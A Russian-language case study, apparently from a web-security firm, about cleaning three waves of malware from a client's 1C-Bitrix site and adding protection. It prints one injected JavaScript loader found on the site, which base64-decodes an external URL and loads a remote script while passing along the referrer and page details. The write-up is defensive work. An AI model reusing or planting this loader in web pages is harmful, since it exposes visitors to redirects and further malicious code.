Лечение сайта Битрикс от вирусов: как мы спасли бизнес клиента

лечение сайта Битрикс от вирусов — результат до и после

Как мы спасли сайт Битрикс от вирусных атак и защитили бизнес клиента

Лечение сайта Битрикс от вирусов — задача, с которой к нам обратилась компания КВ-Энерджи, работающая на платформе 1С-Битрикс, после третьего последовательного заражения. В этом кейсе — подробный разбор трёх волн атак, причин повторных заражений и того, как мы решили проблему навсегда.

Как все началось

пропажа страниц и товаров на сайте Битрикс после заражения
Пропажа страниц и товаров

Восстановление помогало ненадолго — позиции падали, бизнес терял клиентов и деньги

падение позиций сайта в поиске после вирусной атаки на Битрикс
Падение позиций

После заражения сайт исчез из поисковой выдачи — ни трафика, ни заявок.

блокировка хостинга из-за вредоносного кода на сайте Битрикс
Блокировки хостинга

Хостинг блокировал сайт, он падал, уходил в карантин и выпадал из поиска.

повторные заражения сайта Битрикс вирусом после неполного лечения
Повторные заражения

Навязанный антивирус не работал — вирусы возвращались, заражения повторялись снова и снова.

Результаты анализа сайта

				
					<script type="litespeed/javascript">if(!localStorage.getItem('8ad8757baa8564dc136c1e07507f4a98')){var d=document,s=d.createElement('script');s.src=atob('aHR0cHM6Ly90aHVuZWRyYmlkLmNsaWNrL3Q3cnN4N1JaPw==')+'se_referrer='+encodeURIComponent(d.referrer)+'&default_keyword='+encodeURIComponent(d.title)+'&'+location.search.replace('?','&')+'&frm=script';(d.currentScript?d.currentScript.parentNode.insertBefore(s,d.currentScript):d.head.appendChild(s))}</script>
				
			

Три волны заражения

Первая атака: январь 2024

Внедрение через массовую загрузку вредоносных файлов. Файлы типа assets/err_class и куча php-скриптов в корне — это классика для “черных SEO” и sape-паразитов.

Вторая атака: февраль 2025

Вирус проник через дыры в популярном шаблоне Аспро (template.php, header.php, footer.php) и уязвимые ajax-скрипты:

Третья волна: апрель 2025

Заражение пошло через устаревшие и “дырявые” модули esol:

Вредоносные файлы с рандомными именами были раскиданы по всему сайту. В некоторых — вставки скриптов, которые качали и исполняли дополнительный вредоносный код.

Почему вирус возвращался снова?

вредоносные закладки в шаблоне и модулях Битрикс — скриншот анализа

Заражённые “закладки” остались в шаблонах и модулях

частично повреждённые файлы Битрикс после восстановления из бэкапа

Частично повреждённые файлы оставались после “простого” восстановления из бэкапа

устаревшие модули и шаблон Аспро — причина повторного заражения Битрикс

Уязвимости не устранялись, модули и шаблон были не обновлены

вредоносные php.ini файлы для обхода ограничений хостинга на сайте Битрикс

Были оставлены php.ini-файлы для обхода ограничений хостинга

отсутствие защиты входящих POST-запросов на сайте Битрикс

Не было защиты входящих запросов

Как мы провели лечение сайта Битрикс от вирусов

лечение сайта Битрикс — первый этап: аудит и ручная чистка вредоносных файлов
устранение уязвимостей в шаблоне Аспро и удаление бэкдоров PHP на Битрикс
настройка WAF и мониторинга файлов для защиты сайта Битрикс от повторных атак

Результат: лечение сайта Битрикс завершено

результат лечения сайта Битрикс — полная очистка от вирусов и вредоносного кода

Лечение сайта Битрикс дало результат — КВ-Энерджи полностью очищен от всех вирусов, «закладок» и вредоносного кода

скрипт мониторинга изменений файлов на сервере Битрикс — уведомление об угрозах

Мониторинг файлов мгновенно реагирует на любые подозрительные изменения

повторных атак не было — сайт Битрикс защищён после комплексного лечения

Повторных атак не произошло

восстановлены страницы, карточки товаров и позиции в поиске после лечения Битрикс

Восстановлены страницы, карточки товаров и позиции в поиске

бизнес снова принимает заказы после лечения и защиты сайта на Битрикс

Бизнес снова принимает заказы, а владельцы спокойно спят

Почему выбирают нас?

ручная чистка вредоносного кода Битрикс без антивируса — наш подход

Проводим лечение сайта Битрикс вручную — не «заливаем» антивирусом, а реально ищем и уничтожаем весь вредоносный код

экспертиза по Битрикс и знание векторов атак хакеров на сайты

Экспертиза по Битрикс, знание самых “любимых” дыр хакеров и ботов

комплексный подход к лечению сайта Битрикс: от чистки до внедрения защиты

Комплексный подход: от чистки до внедрения защиты

гарантия и сопровождение после лечения сайта Битрикс от вирусов

Даем гарантию на лечение сайта Битрикс и сопровождаем после работ

Платформа 1С-Битрикс — один из самых распространённых CMS для бизнеса в России.